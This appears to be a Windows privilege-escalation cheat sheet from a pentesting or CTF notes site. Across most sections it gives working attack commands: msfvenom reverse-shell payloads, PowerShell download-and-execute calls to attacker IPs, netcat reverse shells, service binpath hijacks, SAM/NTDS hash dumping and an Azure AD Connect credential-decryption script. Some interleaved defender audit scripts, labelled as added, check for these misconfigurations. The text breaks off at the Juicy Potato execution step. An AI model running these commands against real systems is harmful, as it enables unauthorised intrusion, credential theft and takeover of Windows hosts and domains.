On this page
  • 01. Common Tricks
  • 01.1 UAC Bypass
  • 01.2 If you have, are in, or can?
  • 01.3 Service / Registry Exploits
  • 02. Tools
  • 02.1 PowerUp
  • 02.2 PowerUpSQL
  • 02.3 Seatbelt
  • 02.4 SecretsDump
  • 03. Common Exploits
  • 03.0 JuicyPotatoNG (New)
  • 03.1 Juicy Potato (Abusing the golden privileges)
  • 03.2 RoguePotato (No more JuicyPotato? Old story, welcome RoguePotato!)
  • 03.3 MultiPotato
  • 03.4 PrintSpoofer
  • 03.5 Zerologon | CVE 2020-1472
  • 03.6 Fodhelper.exe - UAC Bypass
  • 03.7 Serviio Insecure File Permissions
  • 03.8 PrintNightmare
  • 03.9 EternalBlue (MS17-010)
  • 03.10 Windows-Exploit-Suggester WES-NG
  • 03.11 Windows Kernel Exploits
  • 04. Mimikatz

PrivilegeEsc Windows 👑


Last updated 2 years ago

01. Common Tricks

01.1 UAC Bypass

  • DLL Hijacking UAC Bypass (SystemPropertiesAdvanced.exe)

## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If is true; we are good to go!!

## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack

## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe 
### If you get an error saying "This operation requires an interactive window",
### you need an interactive session: use a C2 framework (e.g. GreatSCT/MSBuild to launch Meterpreter).

## ------------------| Use with interactive shell
### Create the payload and gain a shell using the following method
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### Migrate into explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe

01.2 If you have, are in, or can?

  • AlwaysInstallElevated check

## ------------------| How to check
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

## If the output shows a value named "AlwaysInstallElevated" of type REG_DWORD
## set to 0x1, the AlwaysInstallElevated policy is enabled:
## any user can run an MSI file with elevated privileges.

## ------------------| Exploit 
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi      
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi  


## Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation
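
As an added defender-side example (my own code, not from the original page), the PowerShell below audits the same two registry keys, reports whether the policy is actually effective, shows how to revert it, and lists recent MSI installs from the Application log. The function names are mine; the registry paths and the MsiInstaller event IDs 1033 and 11707 are the real ones.

```powershell
# Added example, not part of the original page: audit and remediate the
# AlwaysInstallElevated policy checked above. Function names are my own.
$aieKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $perKey = foreach ($k in $aieKeys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; Value = $v; Enabled = ($v -eq 1) }
    }
    [pscustomobject]@{
        PerKey    = $perKey
        # Windows Installer honours the policy only when BOTH the machine value
        # and the user value are 1; a single 0x1 is a misconfiguration, not yet a hole.
        Effective = (@($perKey | Where-Object Enabled).Count -eq $aieKeys.Count)
    }
}

function Disable-AlwaysInstallElevated {
    param([switch]$WhatIf)
    foreach ($k in $aieKeys) {
        if (Test-Path -Path $k) {
            Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord -WhatIf:$WhatIf
        }
    }
}

function Get-RecentMsiInstall {
    # MsiInstaller logs 1033 (product installed) and 11707 (installation completed
    # successfully) to the Application log. With the policy on, an install by a
    # non-admin UserId is what to look for.
    param([int]$MaxEvents = 20)
    Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 11707 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, UserId, @{ Name = 'Message'; Expression = { ($_.Message -split "`n")[0] } }
}

$state = Get-AlwaysInstallElevatedState
$state.PerKey | Format-Table -AutoSize
if ($state.Effective) {
    Write-Warning 'AlwaysInstallElevated is effective: any user can install an MSI as SYSTEM.'
    Disable-AlwaysInstallElevated -WhatIf      # drop -WhatIf to apply
    Get-RecentMsiInstall | Format-Table -AutoSize
}
```

If the values are delivered by Group Policy, change the GPO as well; otherwise the next policy refresh re-applies the 0x1.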
  • Do you have SeBackupPrivilege and SeRestorePrivilege?

## ------------------| How to check whether they are enabled
whoami /all | findstr "SeBackupPrivilege SeRestorePrivilege"

## ------------------| Copy those SYSTEM Hives to current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

## Then we also need to copy the Active Directory domain database, ntds.dit

## ------------------| Create diskshadow script on local 
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

## ------------------| Convert the script to Windows format and upload it.
unix2dos script.txt

## ------------------| Use Diskshadow to backup C drive
diskshadow.exe /s script.txt
## The entire file system can now be accessed via the E: drive
ls E:

## ------------------| Use robocopy to backup the E:\Windows\ntds\ntds.dit file.
robocopy /B E:\Windows\ntds\ .\ ntds.dit
# Then download the SAM, SYSTEM and NTDS.DIT files; secretsdump.py extracts the Administrator hash from them

## ------------------| Using wbadmin.exe
## wbadmin needs an SMB share as the backup target, and the share must be
## formatted as NTFS/ReFS. The commands below create such a share on a Linux (Samba) host.
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mount /dev/loop0 ./

echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit
  • If you have SeLoadDriverPrivilege?

## ------------------| Download the following files and upload them to the machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe   
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe   

## ------------------| Create payload and upload
msfvenom  --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe  

## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # This path is required; start your listener before running the exploit
.\ExploitCapcom.exe
  • If the user is in DnsAdmins group?

## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll   

## ------------------| Create SMB share on local machine 
impacket-smbserver share ./

## ------------------| Do this on owned remote box
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\<Path-To-Dll-File>
sc.exe stop dns
## Create a netcat listener, then
sc.exe start dns
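
Added defender-side example, not from the original page: on the DNS server, check whether a ServerLevelPluginDll value is set (that is what the dnscmd /config command above writes), classify its path, verify the DLL's signature, and look for the DNS service restarts the technique needs. The function names are mine; the registry path HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters and System log event 7036 are real.

```powershell
# Added example, not part of the original page: audit the DNS server for the
# ServerLevelPluginDll value. Run on the DNS server from an elevated prompt.
# Read-only unless -Clear is given.
function Get-DnsServerPluginDll {
    param([switch]$Clear)
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $dll = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if (-not $dll) {
        return [pscustomobject]@{ Configured = $false; Path = $null; Signature = $null; Verdict = 'no plugin DLL configured' }
    }
    # A UNC path means the DNS service (running as SYSTEM) loads code from a
    # remote share at start-up; a legitimate plugin is a local, signed DLL.
    $verdict = if ($dll -match '^\\\\') {
        'UNC path: the DLL is loaded from a remote share; treat as hostile'
    } elseif ($dll -match '(?i)^[a-z]:\\windows\\system32\\') {
        'system32 path: confirm the publisher signature'
    } else {
        'non-standard local path: investigate'
    }
    $signature = if (Test-Path -LiteralPath $dll) {
        (Get-AuthenticodeSignature -LiteralPath $dll).Status.ToString()
    } else {
        'file not reachable from this host'
    }
    if ($Clear) {
        Remove-ItemProperty -Path $key -Name ServerLevelPluginDll
        Restart-Service -Name DNS   # the DLL is loaded at service start, so a restart is needed to unload it
    }
    [pscustomobject]@{ Configured = $true; Path = $dll; Signature = $signature; Verdict = $verdict }
}

function Get-DnsServiceRestart {
    # Loading the DLL requires bouncing the service (sc stop/start dns), which the
    # System log records as Service Control Manager 7036 state changes for "DNS Server".
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036; StartTime = (Get-Date).AddHours(-$Hours) } `
        -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like '*DNS Server*' } |
        Select-Object TimeCreated, @{ Name = 'State'; Expression = { $_.Message -replace '^.*entered the (\w+) state.*$', '$1' } }
}

Get-DnsServerPluginDll | Format-List
Get-DnsServiceRestart | Format-Table -AutoSize
```

The value is set by the DNS server's own tooling, so on a healthy server it is normally absent; any UNC path, or a local DLL without a valid signature, combined with a fresh stop/start pair in the System log is the indicator to act on.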
  • If you have GenericAll on user jorden

## ------------------| Disable Kerberos pre-authentication for user jorden
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true

## ------------------| Then run this
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass  
  • If you have GenericWrite on any services

## ------------------| Check that the command works
sc.exe 

## ------------------| If that succeeds, exploit (the space after "binpath=" and "start=" is required)
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""
sc.exe stop UsoSVC
sc.exe config UsoSVC start= auto
sc.exe start UsoSVC 
  • If you can execute xp_dirtree?

## Turn on responder
sudo responder -i tun0

## Execute 
sqlcmd -Q "EXEC xp_dirtree '\\YourIP\test'"

## Get the NTLM hash and crack with 
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
  • If you are in the Azure Admins group?

## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
  • If you are a member of the Event Log Readers group

wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1  
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')

# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*  

# Find lockout events on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName     

#  Command line process login (A new process has been created)
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap

## Check this out for windows event codes
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx

  • If you are in the WSUS Administrators group?

wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe                               

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait for 5-6 minutes
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>
  • If you are a member of the Administrators group but still stuck?

## List Administrators group members
net localgroup Administrators

## Use this simple method to bypass UAC
net use h: \\127.0.0.1\c$
h:
dir 
  • If you are in LAPS_Readers

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Export-Csv -Path "C:\Windows\Temp\laps.csv" -NoTypeInformation
  • Hijacking/Migrating login sessions.

## ------------------| Check who is logged into the machine and which sessions are available
tasklist /v 

## ------------------| Get into a session
## Create payload 
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe   
sudo msfdb run 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Look for explorer.exe (it is more stable), then copy its PID
migrate <PID>

01.3 Service / Registry Exploits

  • Insecure Service Permissions

## ------------------| Enumeration [must have SERVICE_START & SERVICE_STOP permissions]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"     

## ------------------| Check Permissions
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Check BUILTIN\Users:(I)(F) permission

## ------------------| Check for particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>

## ------------------| Exploit
## Check current status
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service
net start <service_name> 
sc STOP <service_name>
sc START <service_name> 
## Set automatic start
sc config <service_name> start= auto
## Remove dependencies
sc config <service_name> depend= ""

## ------------------| Restart service 
cmd
wmic service where caption="<ServiceName>" get name, caption, state, startmode
## If StartMode is Auto,
## check whether we have the privilege to restart the machine
whoami /priv
  • Insecure Service Executables

## ------------------| Check 
### RW Everyone
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### SERVICE_START & SERVICE_STOP permissions 
.\accesschk.exe /accepteula -uwcqv user <service_name>

## ------------------| Exploit
## Back up the original binary, then replace it with shell.exe
## Start the service
net start <service_name> 
sc STOP <service_name> 
sc START <service_name> 

  • Unquoted Service Path

## ------------------| Intro
C:\Program Files\One Folder\Two Folder\Executable.exe
C:\Program.exe
C:\Program Files\One.exe
C:\Program Files\One Folder\Two.exe
C:\Program Files\A Subfolder\Two Folder\Executable.exe

## ------------------| Check for unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

## ------------------| Check if we have 
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
###  Write permission [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwdq <path>

## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name> 
sc STOP <service_name> 
sc START <service_name> 
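
Added defender-side example, not from the original page: the wmic/accesschk checks above, done in PowerShell. It finds services with unquoted image paths, lists the locations CreateProcess would try before the real binary, tests whether the current user can write there, and (with -WhatIf removed) quotes the ImagePath. The function names are mine; Win32_Service and the Services registry key are the real ones.

```powershell
# Added example, not part of the original page: audit and repair unquoted
# service paths. Run elevated to apply the repair. Function names are my own.
function Test-DirectoryWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    # Probe with a temp file rather than interpreting the ACL: this honours
    # group membership and inheritance exactly as the kernel would.
    $probe = Join-Path $Path ([guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllBytes($probe, (New-Object byte[] 0))
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }
        # Keep the executable only; arguments after ".exe" play no part in the lookup.
        $exe = $path -replace '(?i)^(.*?\.exe).*$', '$1'
        if ($exe -notmatch ' ') { continue }
        if ($exe -match '(?i)^[a-z]:\\windows\\') { continue }   # not user-writable on a default install
        # "C:\Program Files\A B\x.exe" is tried as C:\Program.exe, then C:\Program Files\A.exe, then the real path.
        $parts = $exe -split ' '
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            $prefix = $parts[0..($i - 1)] -join ' '
            $dir = Split-Path -Parent $prefix
            [pscustomobject]@{ Candidate = "$prefix.exe"; Directory = $dir; Writable = (Test-DirectoryWritable -Path $dir) }
        }
        [pscustomobject]@{
            Name        = $svc.Name
            StartMode   = $svc.StartMode
            RunAs       = $svc.StartName
            PathName    = $path
            Candidates  = $candidates
            Exploitable = [bool]($candidates | Where-Object { $_.Writable })
        }
    }
}

function Repair-UnquotedServicePath {
    # Quotes the executable part of ImagePath in the registry, which is what
    # 'sc config <name> binPath= "\"...\""' does; -WhatIf previews the change.
    param([Parameter(Mandatory)][string]$Name, [switch]$WhatIf)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $raw = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    if ($raw.StartsWith('"')) { return }
    $exe = $raw -replace '(?i)^(.*?\.exe).*$', '$1'
    $fixed = '"' + $exe + '"' + $raw.Substring($exe.Length)
    Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type ExpandString -WhatIf:$WhatIf
}

$findings = @(Get-UnquotedServicePath)
$findings | Select-Object Name, StartMode, RunAs, Exploitable, PathName | Format-Table -AutoSize
foreach ($f in ($findings | Where-Object { $_.Exploitable })) {
    $f.Candidates | Where-Object { $_.Writable } | Format-Table -AutoSize
    Repair-UnquotedServicePath -Name $f.Name -WhatIf   # drop -WhatIf to apply
}
```

An unquoted path is only a problem when one of the intermediate directories is writable and the service runs as a more privileged account than the writer, which is why the report carries both the Writable flag and the RunAs column.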
  • Weak Registry Permissions

## ------------------| Verify [Check for RW NT AUTHORITY\INTERACTIVE]
Get-Acl HKLM:\<ServicePath>\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\<ServicePath>\<ServiceName>

## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>

## ------------------| Check Current values [ImagePath & ObjectName == LocalSystem]
reg query HKLM\<ServicePath>\<ServiceName>

## ------------------| Add new value
reg add HKLM\<ServicePath>\<ServiceName> /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f
net start <service_name>                
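
Added defender-side example, not from the original page: the accesschk checks from the Insecure Service Executables and Weak Registry Permissions sections above, done with Get-Acl. For every service it reports which low-privileged principals can overwrite the service binary or the service's registry key. The function names and the list of low-privileged principals are mine.

```powershell
# Added example, not part of the original page: find service binaries and
# service registry keys writable by low-privileged principals. Read-only;
# run elevated so every key and binary is readable. Function names are my own.
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that let a principal change what the service runs. Generic rights
# (GENERIC_WRITE/GENERIC_ALL) are not mapped here; accesschk resolves those too.
$fs = [System.Security.AccessControl.FileSystemRights]
$fileWrite = [int]($fs::Write -bor $fs::Modify -bor $fs::FullControl -bor $fs::TakeOwnership -bor $fs::ChangePermissions)
$rr = [System.Security.AccessControl.RegistryRights]
$regWrite = [int]($rr::SetValue -bor $rr::WriteKey -bor $rr::FullControl -bor $rr::TakeOwnership -bor $rr::ChangePermissions)

function Get-LowPrivWriter {
    # Returns the low-privileged identities holding any right in $Mask on the object.
    param($Acl, [int]$Mask, [string]$RightsProperty)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if ($lowPriv -notcontains $id) { continue }
        if (([int]$ace.$RightsProperty) -band $Mask) { $id }
    }
}

function Get-ServiceAclFinding {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = $svc.PathName -replace '(?i)^"?(.*?\.exe).*$', '$1'
        $binWriters = @(); $keyWriters = @()
        if ($exe -and (Test-Path -LiteralPath $exe -PathType Leaf)) {
            $binWriters = @(Get-LowPrivWriter -Acl (Get-Acl -LiteralPath $exe) -Mask $fileWrite -RightsProperty FileSystemRights)
        }
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if (Test-Path -LiteralPath $key) {
            $keyWriters = @(Get-LowPrivWriter -Acl (Get-Acl -LiteralPath $key) -Mask $regWrite -RightsProperty RegistryRights)
        }
        if ($binWriters.Count -gt 0 -or $keyWriters.Count -gt 0) {
            [pscustomobject]@{
                Name             = $svc.Name
                RunAs            = $svc.StartName
                StartMode        = $svc.StartMode
                Binary           = $exe
                BinaryWritableBy = (($binWriters | Select-Object -Unique) -join ', ')
                KeyWritableBy    = (($keyWriters | Select-Object -Unique) -join ', ')
            }
        }
    }
}

Get-ServiceAclFinding | Format-Table -AutoSize
```

A writable binary is fixed by removing the write ACE (for example icacls "<exe>" /remove:g "BUILTIN\Users"); a writable service key means ImagePath or ObjectName can be rewritten exactly as the reg add above does, so the key's ACL needs the same treatment.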

02. Tools

02.1 PowerUp

## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')" 

## ------------------| Best check
Invoke-AllChecks
CurrentUserTokenGroupSid 
Get-RegistryAutoLogon

## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'

02.2 PowerUpSQL

# Download
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1

# Upload 
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')

# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20     

02.3 Seatbelt

# Run ALL enumeration checks
Seatbelt.exe -group=all

02.4 SecretsDump

## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local

## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161

# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- NT hash of an empty password
# aad3b435b51404eeaad3b435b51404ee <-- empty LM hash

## ------------------| Remote NTDS
## Copy ntds file
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Copy sam and system file then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local

## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1

03. Common Exploits

03.0 JuicyPotatoNG (New)

## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is Enabled, we are good to go 👌👌👌

## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip                                                             
unzip JuicyPotatoNG.zip

## ------------------| After uploading it to the victim's machine, create a .bat file
echo powershell -EncodedCommand SQBFAFgAKABOA.....ApAA== > C:\programdata\shell.bat
type C:\programdata\shell.bat

## ------------------| Run
.\JuicyPotatoNG.exe -t * -p <fullPath>\shell.bat
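
Added defender-side example, not from the original page: the "do you hold privilege X" checks in 01.2 (SeBackup/SeRestore, SeLoadDriver) and the SeImpersonate/SeAssignPrimaryToken check just above only look at the current token. The script below lists, machine-wide, every principal assigned those privileges and flags holders outside a default baseline. It needs an elevated prompt for secedit; the function names and the baseline table are mine.

```powershell
# Added example, not part of the original page: machine-wide user-rights audit
# via secedit. Run from an elevated prompt. Function names are my own.
function ConvertTo-AccountName {
    param([string]$Sid)
    try { (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid }   # unresolvable SID or already a name: return as-is
}

function Get-UserRightsAssignment {
    $cfg = Join-Path $env:TEMP ('rights-' + [guid]::NewGuid().ToString('N') + '.inf')
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path -LiteralPath $cfg)) { throw 'secedit export failed; run from an elevated prompt' }
    try {
        $rights = @{}
        foreach ($line in Get-Content -LiteralPath $cfg) {
            # Exported lines look like: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
            if ($line -match '^(Se\w+)\s*=\s*(.*)$') {
                $name = $Matches[1]; $sids = $Matches[2]
                $rights[$name] = @($sids -split ',' | ForEach-Object { ConvertTo-AccountName ($_.Trim().TrimStart('*')) })
            }
        }
        $rights
    } finally {
        Remove-Item -LiteralPath $cfg -Force -ErrorAction SilentlyContinue
    }
}

# Expected holders on a default member server (my baseline, not a Microsoft
# list); anything else deserves a look, e.g. a service account given
# SeImpersonatePrivilege or a help-desk group given SeBackupPrivilege.
$baseline = @{
    SeBackupPrivilege             = @('BUILTIN\Administrators', 'BUILTIN\Backup Operators')
    SeRestorePrivilege            = @('BUILTIN\Administrators', 'BUILTIN\Backup Operators')
    SeLoadDriverPrivilege         = @('BUILTIN\Administrators')
    SeImpersonatePrivilege        = @('BUILTIN\Administrators', 'NT AUTHORITY\SERVICE', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')
    SeAssignPrimaryTokenPrivilege = @('NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')
    SeDebugPrivilege              = @('BUILTIN\Administrators')
}

function Find-UnexpectedRightHolder {
    $rights = Get-UserRightsAssignment
    foreach ($name in $baseline.Keys) {
        $holders = if ($rights.ContainsKey($name)) { $rights[$name] } else { @() }
        foreach ($h in $holders) {
            if ($baseline[$name] -notcontains $h) {
                [pscustomobject]@{ Privilege = $name; Holder = $h }
            }
        }
    }
}

Find-UnexpectedRightHolder | Format-Table -AutoSize
```

Every Potato variant on this page starts from SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so the holders of those two rights are the accounts whose compromise turns into SYSTEM; trimming that list (and running web and SQL services under virtual or managed service accounts) is the mitigation.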

03.1 Juicy Potato (Abusing the golden privileges)

## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is Enabled, we are good to go 👌👌👌

## ------------------| Create .bat script
## Shell through Netcat 
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through Powershell 
cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')   

## ------------------| List CLSID's
.\JuicyPotato.exe -z -l 100

## ------------------| Execute 
